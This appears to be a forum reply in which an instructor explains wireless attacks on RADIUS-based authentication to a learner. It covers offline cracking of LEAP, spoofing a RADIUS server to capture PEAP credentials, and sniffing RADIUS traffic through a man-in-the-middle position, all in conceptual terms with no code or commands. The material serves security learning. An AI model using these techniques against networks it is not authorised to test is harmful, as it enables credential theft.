Hi Francisco,
You are welcome. Wireless pentesting is pretty fun and a good method to learn more about wireless. There are a couple of RADIUS related attacks that you can do from the wireless side.
The first one you might want to try is LEAP as it is vulnerable to offline dictionary / brute-force techniques. We don’t use LEAP anymore in the field…
PEAP is also fun, the wireless client only has to authenticate the radius server so it’s possible to spoof it. When the client sees the certificate of the fake radius server they have to decide if they want to accept the certificate or not…if they do, you get some authentication information you can use for offline attacks.
Bypassing the radius server from the wireless side isn’t possible (as far as I know)…maybe you can mess with it from the LAN side with a mitm attack but I haven’t tried that before. Radius doesn’t encrypt everything so on the LAN you might be able to sniff usernames and some other information.
Tacacs+ encrypts everything so it is more secure, I think that radius however is still more popular…I see more radius servers than tacacs in the field.
You might enjoy this book:
It covers most of the wireless attacks using backtrack or kali.
Rene